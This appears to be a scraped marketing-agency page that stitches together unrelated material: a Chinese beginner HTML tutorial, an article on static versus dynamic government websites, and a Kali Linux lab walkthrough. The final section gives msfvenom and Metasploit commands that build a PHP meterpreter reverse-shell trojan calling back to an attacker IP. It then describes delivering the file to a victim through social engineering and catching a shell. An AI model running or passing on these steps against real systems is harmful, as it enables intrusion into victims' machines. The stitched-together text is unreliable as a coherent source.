整合营销服务商
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
伙伴们,好几天不见了,这一周菜鸟小白工作很忙,所以没有每天更新学习内容,但是菜鸟小白的学习是没有停下来的,只是没有时间来整理学习笔记了。现在就将菜鸟小白这两天学习的HTML基础和大家分享,其中还会拿一些标签进行举例,显示效果。
HTML语言是一种标签语言,它不需要编译,可以直接由浏览器执行。在标准网页设计中HTML负责填充网页的内容,HTML编写的超文本文档(文件)称之为HTML文档(网页),它包含了一些html元素,使用html或者htm为文件名后缀,能独立于各种操作系统平台,如Unix、Windows等
标准的html文档是由标签和要显示在网页上的内容组成。HTML用于描述功能的符号成为“标签”,如<html>、<body>、<table>等。HTML标签规定HTML文档的逻辑结构,并且控制文档的显示格式,然后由浏览器来负责解释并显示页面。通过使用标签可以区分文本文件的各个组成部分,对页面上的文字、表格、图片等多媒体数据所出现的位置、形式、顺序及网页间的超链接关系进行设定。
标签都是封装在一对尖括号“<……>”之中。标签只改变网页的显示方式,本身不会显示在窗口中。HTML文档中最先出现的标签是<html>标签。<html>标签是文档标识符,它是成对出现的,首标签<html>和尾标签</html>分别位于文档的最前面和最后面,明确地表示文档是以超文本标识语言(HTML)编写的。该标签不带任何属性
<html>……</html>之间有如下标签:
head是英文“头”的意思。习惯上用户把HTML文档分为文档头和文档主体两部分。文档主体部分就是在web浏览器窗口的用户区内看到的内容,而文档头部分用来规定该文档的标题(出现在web浏览器窗口的标题栏中)和文档的一些属性。<head>标签对的作用就是控制文档的头部信息。中间可以使用<title>……</title>、<script>……</script>标签对,在此标签中间可以HTML文档的标签是可以嵌套的,即在一对标签中可以嵌入另外一对子标签,用来规定母标签所含范围的属性或其中某一部分内容,嵌套在<head>……</head>标签对中使用的主要有<title>标签
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
菜鸟小白的学习分享
</head>
</html>
保存为HTML文件后显示如下:
<title>标签是成对出现的,用以规定HTML文档的标题。在<title>……</title>之间的内容将显示在web浏览器窗口的标题栏中。另外,<title>……</title>标签对只能放在<head>……</head>标签对之间,而且其内部不能包含其它标签。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
</html>
修改后显示如下:
<body>标签也是成对出现的。在<body>……</body>之间的内容将显示在web浏览器窗口的用户区内,它是HTML文档的主体部分。可以把HTML文档的主体区域简单地理解成标题以外的所有部分,该部分可以包含<table>、<font>、<img>、<div>等标签。结束标签</body>指明主体区域的结尾,在<body>中可以规定整个文档的一些基本属性:
我们验证了前两个属性
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
测试内容
</body>
</html>
显示效果如下:
在html中有许多特殊字符需要处理,例如:“<”、">"这两个符号本身是用来表示标签的开始和结束的,是没有办法通过直接打出来的,必须输入编码表示法:“<”和“>”。
通常情况下html会自动截取多余的空格。不管你加多少个空格,都被看做一个空格。如果要显示多个空格,可以使用 表示空格
我们看看实现代码
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<测试内容> 空格在中间 看到了吧
</body>
</html>
显示效果:
在浏览器中控制文本对象的显示,包括段落、换行、水平线等标签,下面介绍几个常用的html格式标签。所有的格式标签全部都是在嵌套在<body>……</body>标签对之间的
全称paragraph。<p>……</p>标签对用于创建一个段落,支持align属性来设置对齐方式,语法如下:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<p align="center"><测试内容> 空格在中间 看到了吧</p>
</body>
</html>
显示效果:
在不另起一段的情况下将当前文本强制换行,<br>标签属于单独出现的标签,禁止出现结束标签。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<p align="center"><测试内容></br> 空格在中间 看到了吧</p>
</body>
</html>
显示效果:
可以完整保留设计者在源文件中所定义的格式,包含各种空格,缩进,以及其他特殊字符,全部都原封不动的展示在浏览器页面上。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<p align="center"><测试内容></br> 空格在中间 看到了吧</p>
<pre>
我是菜鸟小白
你们的好朋友
让我们一起学习吧!!!
</pre>
</body>
</html>
显示效果:
主要分为无序列表、排序列表、目录列表、菜单列表和描述性列表五种类型
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<ul>
<li>我是菜鸟小白</li>
<li>你们的好朋友</li>
<li> 让我们一起学习吧!!!</li>
</ul>
</body>
</html>
效果如下:
描述性列表:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鸟小白的学习分享</title>
</head>
<body bgcolor="11ffff" text="000000">
<dl>
<dt>菜鸟小白测试表头</dt>
<dd>我是菜鸟小白</dd>
<dd>你们的好朋友</dd>
<dd> 让我们一起学习吧!!!</dd>
<dt>菜鸟小白测试表头2</dt>
<dd>我是菜鸟小白</dd>
<dd>你们的好朋友</dd>
<dd> 让我们一起学习吧!!!</dd>
</dl>
</body>
</html>
显示效果如下:
好了,今天的内容就到这了,我们明天继续学习HTML基础内容,不见不散~
辑导语:我们可以发现很多政府网站基本都是选择静态发布的,这是因为静态发布能够更好的保证网站的速度以及安全性等等,政府网站这类对安全性要求较高的网站多会选择静态发布;本文作者分享了关于政府网站选择静态发布的原因,我们一起来了解一下。
今年过了年接手了政府网站建设相关的产品工作,发现和以往产品最大的不同是,政府网站建设用的是静态发布,以前做的移动产品都是动态的。那么政府网站为什么一般都选择静态发布呢?今天就来总结分析下。
静态与动态是相对来说的,静态网页就是我们常见的以.htm、.html、.shtml等后缀结尾的页面。
通常静态网页的制作流程是:
第一步:发布信息到数据库
第二步:选择页面的模板
第三步:程序读取模板+数据库信息=静态页面
第四步:发布索引页面(如首页、引导页等)
静态页面的生成至少需要上述几个步骤才能完成。
静态网站设计所采用的的技术原理是一对一的形式,也就是说在这样的网站上面,一个内容对应的就是一个页面,对应服务器上的一个文件;所以静态网站可以简单理解为纯粹就是几个制作好的页面而已。
网页在设计好并上传到服务器后,就不能对网站的内容进行修改了,除非把网站文件下载下来,用专业的网站制作软件修改编辑好后再次上传;所以在静态页面的制作中,模板是关键,因为一旦想要调整页面,必须再次创建,而如果数据量大的话,那么这个更新时间将相当可怕。
另外,静态页面不需要与数据库通信,无论网站访问者如何操作,都只是让服务器把固有的数据传送给请求者,没有脚本计算和后台数据库读取的过程。
最后补充一下,URL相对动态网站来说也比较清晰,如,product.html。
因为静态网站没有其他程序和数据读取,因此静态网站打开速度相对比较快。
动态网页网址中动态参数太多,而且链接过长,而静态网页则相反,因此静态网页比动态网页更受搜索引擎欢迎。
再加上静态页面打开速度快、网站URL标准化程度高、网站简洁、网站用户体验度好,使得静态网页更容易被搜索引擎所收录。
因为静态页面都是纯html格式的文件,所以不管黑客使用什么样的手段都无法直接对网站进行攻击,所以在网站安全性方面,静态页面是做的最好、最安全的一种方式。
因为静态页面无法在调整后自动更新,不能直接对网站内容进行修改,所以如果要调整页面,必须再次创建,维护操作十分繁琐。
虽然静态页面不需要对数据进行不断读取,但是在生产静态页面的时候,程序需要对服务器进行创建文件夹、创建html文件、删除文件等操作,所以如果网站存在上万篇文章,那么每生成一次静态文件,就会对网站服务器带来很大压力,而且也无形地增加空间占用率。
静态页面由于受其特性影响,无法实现会员注册、在线留言等功能,只能简单地以信息展示为主。
动态网站是先从数据库里面获取数据,然后再按一个格式显示出来,也就是说只需要一个显示页面内容的框架,就可以把成千上万的网页显示出来了,所以动态网站对服务器空间要求很小。
动态网站内容可以实时更新,而且与用户交互性强,比如一些论坛、注册、在线聊天页面都是动态的。
另外,动态网站由于每次加载一个新的页面,都需要与后台数据库通信,所以加载速度会稍慢一些。
在URL方面,动态网站URL可能会带有参数。
动态网站的开发语言主要有:ASP、JSP、PHP、ASP.NET,早期最普遍的是ASP开发的网站,现在主流网站开发语言是PHP、ASP.NET。这些程序都要使用数据库才能完成动态操作。数据库常用的有:ACCESS、MYSQL、MSSQL、ORACLE等。
由于动态页面可以通过网站程序直接调用大量数据直接展示到网站前台,因此动态页面对网站服务器产生的压力相对较小。
但是由于动态页面需要不断的调用数据库中的数据,所以对数据库的要求还是比较大的,而且频繁的调用读取会增加数据库的负担,严重情况有可能会导致数据库崩溃现象。
动态网站由于可以实时修改更新,因此维护方便,同时由于可以存储大量数据,所以在需要时可以立即查询。
搜索引擎的算法受网站安全性、网站打开速度、网站URL对用户的体验度等影响,使得搜索引擎对动态页面赋予的权重值和信任度相对较低。
由于动态页面网站的URL参数和网站目录结构都是很明显的暴露在浏览器上面的,所以很多黑客可以通过修改网站的URL参数从而获得网站的shell权限,进入后台拿到管理员账号密码,对网站进行非法操作,因此动态网站的安全性较低。
除此之外,因为动态网站会用到数据库,所以对数据库的安全和保密性要求较高,要专业技术人员提供维护才能保证网络安全。
伪静态本身其实就是动态网页,只不过是被转换重写成了静态网页,此时通过浏览器访问的地址和真的静态页面没有区别。
当考虑搜索引擎优化SEO时,可以将动态页面通过服务器处理成静态页面,比如论坛帖子页面,都是经过伪静态处理成静态页面。
但是伪静态不是真实地址,到底要显示哪个页面也就不能直接指定,而要由CPU来判断,所以CPU占有量的上升是伪静态最大的弊病。
总之,为了SEO,网站可以选择伪静态,但是为了避免CPU超负荷,可以少量使用伪静态,甚至可以只在专门提供给SEO的Archiver中使用伪静态。
当然,现在也有越来越多的网站采用动静结合的方式,因此可根据具体需求及实际情况来选择不同的技术方案。
作者:王山而,喜欢读书、喜欢研究用户心理,坐标:北京。公众号:小2在思考
本文由@王山而 原创发布于人人都是产品经理,未经许可,禁止许可。
题图来自 unsplash,基于CCO协议
、背景介绍
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3.1 将受害者主机(Windows7)跟攻击者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。
3.2 查看实验的两台主机的IP地址,如下图所示。
命令:ifconfig
3.3 利用“msfvenom”木马生成工具生成对应的木马文件,如下图所示。
步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:利用msfvenom工具生成对应的木马文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe > 生成木马文件的保存位置
例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php
步骤3:在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成,如下图所示,木马文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件)。
3.4 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解),如下图所示。
3.5 安装“phpstudy集成环境”,如下图所示。
步骤1:打开“phpstudy”官网选择与你电脑系统相对应的软件版本下载。
步骤2:安装注意事项
1. 安装路径不能包含“中文”或者“空格”,否则会报错(例如错误提示:Can't change dir to 'G:\x65b0\x5efa\x6587\)
2. 保证安装路径是纯净的,安装路径下不能有已安装的V8版本,若重新安装,请选择其它路径
步骤3:phpstudy官方使用教程,需者自取。
网址:https://www.php.cn/course/1066.html
3.6 安装好对应的软件后,启动phpstudy中的环境,如下图所示。
步骤1:点击相应的环境旁边的启动按钮启动即可。
步骤2:进入apache服务,如下图所示。
3.7 将对应的木马文件上传到apache服务的www目录下,如下图所示。
3.8 启动Metasploit(msf)渗透框架,如下图所示。
命令1:msfconsole
命令2:use exploit/multi/handler
命令3:set payload php/meterpreter/reverse_tcp
命令4:show options
命令5:set lhost 192.168.78.168
命令6:run(启动攻击模块)
3.9 拿到目标主机服务器的shell,如下图所示。
命令:shell进入shell页面。
*请认真填写需求信息,我们会在24小时内与您取得联系。
